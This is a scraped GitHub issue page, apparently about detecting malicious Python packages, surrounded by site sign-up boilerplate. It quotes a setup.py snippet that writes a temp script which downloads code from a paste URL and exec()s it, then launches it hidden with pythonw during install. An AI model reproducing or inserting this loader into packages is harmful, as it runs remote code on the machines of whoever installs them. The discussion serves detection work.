We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
For instance:
_ttmp = _ffile(delete=False) _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('https://paste.bingner.com/paste/dsvc4/raw').read())""") _ttmp.close() try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}") except: pass setup(
We might want to also take into account running python XX.py after downloading
python XX.py
The text was updated successfully, but these errors were encountered:
Successfully merging a pull request may close this issue.
For instance:
We might want to also take into account running
python XX.py
after downloadingThe text was updated successfully, but these errors were encountered: